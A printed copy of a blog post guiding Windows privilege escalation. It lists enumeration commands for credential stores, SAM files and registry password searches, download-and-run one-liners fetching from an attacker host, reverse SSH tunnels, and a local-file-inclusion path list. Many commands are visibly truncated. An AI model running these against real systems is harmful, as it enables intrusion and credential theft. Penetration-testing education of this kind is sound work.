Windows Privilege Escalation Guide
Posted on January 26, 2018 (printed 15/10/2018 from https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)

Privilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need to know what to check and look for. This takes familiarity with systems that normally comes along with experience. At first privilege escalation can seem like a daunting task, but after a while you start to filter through what is normal and what isn't. It eventually becomes easier to know what to look for rather than digging through everything hoping to find that needle in the haystack. Hopefully this guide will provide a good foundation to build upon and get you started.

This guide is influenced by g0tm1lk's Basic Linux Privilege Escalation (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/), which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.

Note: I am not an expert and still learning myself.

## Guide Layout

In each section I first provide the old trusted CMD commands and then also a PowerShell equivalent for posterity's sake. It's good to have both tools under your belt, and PowerShell is much more versatile for scripting than the traditional CMD. However, there isn't a PowerShell equivalent for everything (or CMD is still simply easier/better for certain things), so some sections will only contain regular CMD commands.

Version 1.2 - Last updated July 2018

## Operating System

What is the OS and architecture? Is it missing any patches?

```
systeminfo
wmic qfe
```

Is there anything interesting in environment variables? A domain controller in `LOGONSERVER`?

```
set
Get-ChildItem Env: | ft Key,Value
```

Are there any other connected drives?

```
net use
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSyste
```

## Users

Who are you?

```
whoami
echo %USERNAME%
$env:UserName
```

Any interesting user privileges? Note: the State column does not mean that the user does or does not have access to this privilege. If the privilege is listed, then that user has it.

```
whoami /priv
```

What users are on the system? Any old user profiles that weren't cleaned up?

```
net users
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
```

Is anyone else logged in?

```
qwinsta
```

What groups are on the system?

```
net localgroup
Get-LocalGroup | ft Name
```

Are any of the users in the Administrators group?

```
net localgroup Administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
```

Anything in the Registry for User Autologon?

```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win
```

Anything interesting in Credential Manager?

```
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentia
```

Can we access SAM and SYSTEM files?

```
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```

## Programs, Processes, and Services

What software is installed?

```
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```

Are there any weak folder or file permissions? Full Permissions for Everyone or Users on Program Folders?

```
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\
```

Modify Permissions for Everyone or Users on Program Folders?

```
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { G
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { G
```

You can also upload accesschk from Sysinternals to check for writeable folders and files.

```
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
```

What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it? See Port Forwarding in the Appendix.

```
tasklist /svc
tasklist /v
net start
sc query
```

Get-Process has a `-IncludeUserName` option to see the process owner; however, you have to have administrative rights to use it.

```
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName,
Get-Service
```

This one-liner returns the process owner without admin rights. If something is blank under owner, it's probably running as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.

```
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlik
```

Any weak service permissions? Can we reconfigure anything? Again, upload accesschk.

```
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *
```

Are there any unquoted service paths?

```
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Aut
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode
```

What scheduled tasks are there? Anything custom implemented?

```
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskNam
```
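The guide suggests saving command output to text files and parsing it offline. As an added example (not from the original post or the author's WindowsEnum script), this Python audit reads the fixed-width table printed by the `wmic service get name,displayname,pathname,startmode` command above, flags services whose image path is unquoted and contains spaces, and lists the directories whose ACLs decide whether that matters. The sample output, service names and vendor folders are constructed; skipping paths under C:\Windows is an assumed noise filter, not something the page states.

```python
import re
# wmic prints fixed-width columns; pad the constructed sample the same way
_row = lambda n, d, p, m: f"{n:<9}{d:<20}{p:<56}{m}"

# Constructed sample of `wmic service get name,displayname,pathname,startmode` (not from a real host)
SAMPLE_WMIC = "\n".join([
    _row("Name", "DisplayName", "PathName", "StartMode"),
    _row("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    _row("AcmeSvc", "Acme Update Agent", r"C:\Program Files\Acme Corp\update agent\agent.exe -svc", "Auto"),
    _row("GoodSvc", "Good Vendor Agent", r'"C:\Program Files\Good Vendor\agent.exe" -k run', "Auto"),
    _row("OldSvc", "Legacy Helper", r"C:\Legacy Tools\helper.exe", "Manual"),
])

def parse_wmic_table(text: str) -> list:
    """Split wmic's fixed-width table into dicts using the header's column offsets."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    rows = []
    for line in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            row[name] = line[start:end].strip()
        rows.append(row)
    return rows

def _exe_part(pathname: str) -> str:
    """Everything up to and including .exe; anything after that is service arguments."""
    m = re.search(r"\.exe\b", pathname, re.IGNORECASE)
    return pathname[: m.end()] if m else pathname

def is_unquoted_with_spaces(pathname: str) -> bool:
    return not pathname.lstrip().startswith('"') and " " in _exe_part(pathname)

def dirs_to_review(pathname: str) -> list:
    """Directories whose ACLs decide the risk: Windows tries each space-delimited prefix first."""
    parts = _exe_part(pathname).split(" ")
    dirs = [" ".join(parts[:i]).rsplit("\\", 1)[0] + "\\" for i in range(1, len(parts))]
    return list(dict.fromkeys(dirs))  # de-duplicate, keep order

def find_unquoted_services(wmic_output: str, skip_windows_dir: bool = True) -> list:
    """Skip C:\\Windows\\ paths (assumed noise filter) and keep unquoted paths containing spaces."""
    findings = []
    for row in parse_wmic_table(wmic_output):
        path = row["PathName"]
        if skip_windows_dir and path.lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(path):
            findings.append({**row, "ReviewDirs": dirs_to_review(path)})
    return findings
```

Each directory in `ReviewDirs` should then be checked with the icacls or accesschk commands above; an unquoted path is only a finding if a non-admin principal can write to one of them.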
What is run at startup?

```
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Win
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Win
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Wind
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Wind
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
```

Is AlwaysInstallElevated enabled? I have not run across this, but it doesn't hurt to check. Check the HKLM hive as well: the policy only takes effect when it is enabled in both HKLM and HKCU.

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInsta
```

## Networking

What NICs are connected? Are there multiple networks?

```
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```

What routes do we have?

```
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric
```

Anything in the ARP cache?

```
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress
```

Are there connections to other hosts?

```
netstat -ano
```

Anything in the hosts file?

```
C:\WINDOWS\System32\drivers\etc\hosts
```

Is the firewall turned on? If so, what's configured?

```
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
```

Any other interesting interface configurations?

```
netsh dump
```

Are there any SNMP configurations?

```
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```

## Interesting Files and Sensitive Information

This section may be a little noisy, so you may want to output commands into txt files to review and parse as you wish.

Any passwords in the registry?

```
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
```

Are there sysprep or unattend files available that weren't cleaned up?

```
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.tx
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -Error
```

If the server is an IIS webserver, what's in inetpub? Any hidden directories? web.config files?

```
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAc
```

What's in the IIS logs?

```
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
```

Is XAMPP, Apache, or PHP installed? Are there any XAMPP, Apache, or PHP configuration files?

```
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini
```

Any Apache web logs?

```
dir /s access.log error.log
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -Error
```

Any interesting files to look at? Possibly inside user directories (Desktop, Documents, etc.)?

```
dir /s *pass* == *vnc* == *.config* 2>nul
Get-Childitem -Path C:\Users\ -Include *password*,*vnc*,*.config -File -Rec
```

Files containing "password" inside them?

```
findstr /si password *.xml *.ini *.txt *.config 2>nul
Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorActio
```

## Appendix

### Enumeration Script

I've created a PowerShell script which pretty much automates all of the above. You can check it out here (https://github.com/absolomb/WindowsEnum).

### Transferring Files

At some point during privilege escalation you will need to get files onto your target. Below are some easy ways to do so.

PowerShell Cmdlet (PowerShell 3.0 and higher):

```
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\fil
```

PowerShell one-liner:

```
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename",
```

PowerShell script:

```
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -
```

Non-interactive FTP via text file. Useful for when you only have limited command execution.

```
echo open 10.10.10.11 21 > ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET filename>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
```

Keep the space before the first `>`: CMD treats a single digit immediately before `>` as a file handle, so `21> ftp.txt` would write `open 10.10.10.11 2` and the script would try port 2.

CertUtil:

```
certutil.exe -urlcache -split -f https://myserver/filename outputfilename
```

### Port Forwarding

This is useful for exposing inside services that aren't available from outside the machine, normally due to firewall settings.

Upload plink.exe to the target. Start SSH on your attacking machine. For example, to expose SMB, on the target run:

```
plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
```

As of Windows 10 1803 (April 2018 Update), the ssh client is now included and turned on by default, so you're able to use ssh to do port forwarding right out of the box now. OpenSSH has no `-pw` switch; it prompts for the password instead.

```
ssh -l root -R 445:127.0.0.1:445 YOURIPADDRESS
```

### Local File Inclusion List

This is not an exhaustive list; installation directories will vary. I've only listed common ones.

```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
C:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```

Tags: guides

Ryan McFarland • 2018